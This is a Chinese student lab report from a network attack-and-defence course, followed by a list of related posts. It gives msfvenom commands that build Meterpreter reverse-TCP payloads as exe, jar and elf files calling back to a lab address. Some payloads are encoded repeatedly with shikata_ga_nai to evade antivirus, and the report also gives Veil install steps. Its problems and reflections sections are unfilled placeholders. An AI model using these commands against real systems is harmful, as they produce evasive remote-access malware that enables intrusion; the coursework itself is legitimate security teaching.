20222410 2024-2025-1 《網路與系統攻防技術》實驗三實驗報告

Lelouch-vi發表於2024-10-18

1.實驗內容

正確使用msf編碼器，veil-evasion，自己利用shellcode程式設計等免殺工具或技巧
- 正確使用msf編碼器，使用msfvenom生成如jar之類的其他檔案
- veil，加殼工具
- 使用C + shellcode程式設計
透過組合應用各種技術實現惡意程式碼免殺
如果成功實現了免殺的，簡單語言描述原理，不要截圖。與殺軟共生的結果驗證要截圖。
用另一電腦實測，在殺軟開啟的情況下，可執行並回連成功，註明電腦的殺軟名稱與版本

2.實驗過程

2.1 正確使用msf編碼器，veil-evasion，自己利用shellcode程式設計等免殺工具或技巧

2.1.1 正確使用msf編碼器，使用msfvenom生成如jar之類的其他檔案

檢視 msfvenom 支援的所有輸出格式：輸入msfvenom --list formats

輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh.exe，生成payload

-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 型別，是一個 Meterpreter 反向 TCP 連線
LHOST=192.168.136.132 設定了連線回的本地 IP 地址，即kali虛擬機器的 IP 地址
LPORT=2410 設定了連線回的本地埠號，這裡為學號後四位
-f exe: 這指定了輸出格式為 Windows 可執行檔案

檢視 msfvenom 支援的所有編碼方式：輸入msfvenom --list encoders

使用編碼器對payload進行編碼，輸入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh-2.exe

-e x86/shikata_ga_nai: 這指定了要使用的編碼器；
-b ‘\x00’: 這指定了需要避免的壞字符集；
LHOST、LPORT同上；

多次編碼：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh-3.exe
-i 10表示編碼10次

選擇一個適用於Java環境的payload來生成jar檔案：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f jar > 20222410yh-4.jar

使用編碼器對payload進行編碼：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -e x86/shikata_ga_nai -i 10 -f jar > 20222410yh-5.jar

生成一個反向 TCP 連線的 Linux elf 可執行檔案：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f elf > 20222410yh-6.elf

使用編碼器對payload進行編碼：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -e x86/shikata_ga_nai -i 10 -f elf > 20222410yh-7.elf

將生成的20222410yh.exe等多個檔案放到共享資料夾中傳到主機上
20222410yh.exe:

20222410yh-2.exe:

20222410yh-3.exe:

20222410yh-5.jar:

20222410yh-7.elf:

2.1.2 使用veil工具

安裝veil，需要保持虛擬機器是聯網狀態，依次輸入以下命令：

mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32

當輸入完sudo apt-get install wine32後報錯，此時先輸入dpkg --add-architecture i386，再輸入sudo apt-get update，然後輸入sudo apt-get install wine32即可

3.問題及解決方案

問題1：XXXXXX
問題1解決方案：XXXXXX
問題2：XXXXXX
問題2解決方案：XXXXXX - ...

4.學習感悟、思考等

xxx xxx

20222410 2024-2025-1 《網路與系統攻防技術》實驗二實驗報告
2024-10-15
20222413 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-06
20222417 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-08
20222404 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-11
20222406 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-06
20222420 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-07
20222407 2024-2025-1《網路與系統攻防技術》實驗一實驗報告
2024-10-09
20222401 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-09
20222414 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-09
20222402 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-10
20222321 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-10
20222414 2024-2025-1 《網路與系統攻防技術》實驗二實驗報告
2024-10-18
20222418 2024-2025-1 《網路與系統攻防技術》實驗二實驗報告
2024-10-18
20222301 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-07
20222314 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-09
20222302 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-11
20222318 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-11
20222311 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-11
20222319zzs 2024-2025-1 《網路與系統攻防技術》實驗一實驗報告
2024-10-11
作業系統實驗六實驗報告
2017-08-11
作業系統
作業系統實驗七實驗報告
2017-08-13
作業系統
計算機網路實驗報告：【Wirshark 實驗】
2020-12-26
計算機網路
20145332 《網路攻防》逆向與Bof實驗
2017-02-28
計算機作業系統實驗之_程式觀測_實驗報告
2012-11-10
計算機作業系統
作業系統概念-程式控制實驗報告
2020-11-17
作業系統
FTP實驗報告
2018-08-23
FTP
實驗報告5
2024-04-21
實驗報告4
2024-04-11
ucore作業系統lab2實驗報告
2015-06-14
作業系統
Linux網路安全技術與實現第2章之原理及實驗
2018-10-29
Linux
計算機網路實驗三
2020-12-26
計算機網路
計算機網路實驗三—— Cisco Packet Tracer 實驗
2020-12-26
計算機網路
c語言程式實驗——實驗報告五
2024-04-18
C語言
c語言程式實驗————實驗報告十
2024-05-26
C語言
c語言程式實驗————實驗報告十二
2024-06-21
C語言
報價系統概念與技術實現
2020-12-09
實驗報告5 6
2024-04-21
「雜文」應用基礎實踐一（網路+Java）實驗報告
2024-05-25
Java